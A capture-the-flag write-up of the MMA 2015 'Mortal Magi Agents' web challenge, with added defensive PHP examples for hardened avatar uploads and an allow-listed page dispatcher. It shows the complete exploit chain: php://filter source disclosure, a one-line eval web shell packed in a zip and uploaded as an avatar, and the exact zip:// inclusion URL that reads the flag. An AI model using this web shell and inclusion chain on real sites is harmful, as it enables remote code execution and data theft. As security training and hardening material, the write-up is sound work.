[MMA 2015] [Web – Mortal Magi Agents] Write Up

Description

We were given a link to the challenge:
http://magiagents.chal.mmactf.link

Resolution

We registered an account and logged in to test the website.

The only thing we could do was upload an avatar on the settings page:
http://magiagents.chal.mmactf.link/index.php?page=settings

We tried uploading several file types: image formats such as png/jpg, and some others, php for example.
The .jpg and .png extensions were kept, but .php was, of course, stripped.
The uploaded file was stored in the avators directory under the name <user><sha1 of the file content>[<extension>].
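The upload behaviour above (extension stripping, file kept under a predictable name inside the web root) is what later lets an uploaded archive be reached through a wrapper. As an added example that is not the challenge's code, here is how an avatar upload handler can make the stored bytes useless to a later include: it checks the content type from the bytes, re-encodes the image through GD so that only decoded pixels reach disk, names the file with a random token, and stores it outside the web root. The names $username, $_FILES['avatar'] and AVATAR_DIR are assumptions.

```php
<?php
// Added example (not the challenge's code): hardened avatar storage.
// Assumptions: AVATAR_DIR lives outside the document root and is served by a
// separate read-only endpoint; $username comes from the authenticated session.

const AVATAR_DIR = __DIR__ . '/../avatar_store';   // outside the web root (assumption)
const MAX_AVATAR_BYTES = 512 * 1024;

function store_avatar(string $username, array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_AVATAR_BYTES) {
        throw new RuntimeException('avatar too large');
    }

    // Decide the type from the bytes, never from the client-supplied file name.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if (!in_array($mime, ['image/png', 'image/jpeg'], true)) {
        throw new RuntimeException('only PNG or JPEG avatars are accepted');
    }

    // Re-encode through GD: the stored file is a fresh PNG built from the decoded
    // pixels, so bytes that are not pixel data (an archive, trailing text, extra
    // chunks) are not carried into what ends up on disk.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('file is not a decodable image');
    }

    // Random, non-guessable name derived from the user and a fresh token, so the
    // stored path cannot be predicted from the file content alone.
    $safeUser = preg_replace('/[^a-z0-9_]/i', '', $username);
    $name = $safeUser . '_' . bin2hex(random_bytes(16)) . '.png';
    $dest = AVATAR_DIR . '/' . $name;

    if (!imagepng($img, $dest)) {
        imagedestroy($img);
        throw new RuntimeException('could not write avatar');
    }
    imagedestroy($img);
    return $name;
}

// Usage from the settings page handler (hypothetical):
// $avatarName = store_avatar($_SESSION['user'], $_FILES['avatar']);
```

Because the file is written outside the web root, a small endpoint has to read it back with readfile() and an image content type; that endpoint only ever serves files by the stored name, so nothing under the upload directory is reachable through the page dispatcher.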

We found two potential ways to solve this challenge:

  1. an SQL injection in the login parameter
    http://magiagents.chal.mmactf.link/index.php?page=login
    We dumped the magiagents database, and the tables admins/users.
  2. a Local File Inclusion, using PHP wrappers
    http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=settings (the page name, without the .php)
    With this we dumped all of the source code.

We discovered an interesting part of the code in the home.php file:

if (isset($_SESSION["admin"]) && $_SESSION["admin"]) {
    echo file_get_contents("../flag");
}

Meanwhile we kept working on the SQLi and, I must admit, after hours and hours we were stuck…
So we decided to give it another try, using the PHP wrappers in a different manner:
the only thing to do was to upload a file and include it.
But… how to do this when the extension is not kept during upload?
The answer is actually simple: use a zip file with a PHP file embedded inside!
Using the PHP zip wrapper, we should be able to extract “pown.php” from our archive.
As stated in the PHP documentation, the syntax is:
zip://archive.zip#file.txt

We created a zip file with a PHP file named “pown.php”, with the following code:

<?php eval($_GET['q']); ?>

Then we uploaded our archive; it was renamed following the <user><sha1> template, without the .zip extension.
The “.php” was appended to the requested page name during inclusion:

<?php include("$page.php"); ?>

Since the include adds the “.php” itself, we had to use “pown” instead of “pown.php”; in our case the plain-text page value was:
zip://avators/userSHA1#pown&q=echo file_get_contents('../flag');
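The root cause is the dispatcher itself: include("$page.php") hands an attacker-controlled string straight to PHP's stream layer, so appending an extension does nothing against php://filter or against a zip:// path whose fragment names the entry. Note that allow_url_include has no effect here either, since both are local wrappers. As an added example that is not the challenge's code, here is the same dispatcher rewritten around an allow list; PAGES_DIR and the page names in ALLOWED_PAGES are assumptions.

```php
<?php
// Added example (not the challenge's code): an allow-listed page dispatcher
// replacing include("$page.php"). PAGES_DIR and ALLOWED_PAGES are assumptions.

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'login', 'settings', 'logout'];

// Returns the absolute path of the page file to include, or null when the
// request must be refused. Kept free of side effects so it can be unit-tested.
function resolve_page(?string $page): ?string
{
    if ($page === null || $page === '') {
        $page = 'home';
    }

    // Exact match against the allow list: a wrapper scheme (php://, zip://),
    // a '#' fragment, a traversal sequence or a null byte can never equal one
    // of these literals, so none of them reach the include.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // Belt and braces: confirm the resolved file really sits inside PAGES_DIR.
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    $base = realpath(PAGES_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? null;
$path = resolve_page($requested);

if ($path === null) {
    http_response_code(404);
    // Record the raw value: a page parameter starting with php:// or zip://
    // is an unambiguous inclusion probe and is worth an alert, not just a 404.
    error_log('refused page=' . var_export($requested, true));
    exit;
}

include $path;
```

The allow list is the control; the realpath check only guards against a mistake in the list itself (for example a name containing a slash added later). Logging the rejected raw value is what turns this from a silent fix into a detection: in the scenario described above, the entries would show the php://filter probes and the zip:// requests with their %23 fragment decoded.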

URL encoded:
zip://avators/userSHA1%23pown&q=echo%20file_get_contents%28%27../flag%27%29

We requested this URL:
http://magiagents.chal.mmactf.link/index.php?page=zip://avators/userSHA1%23pown&q=echo%20file_get_contents%28%27../flag%27%29

The flag was included in the content of the page:
MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
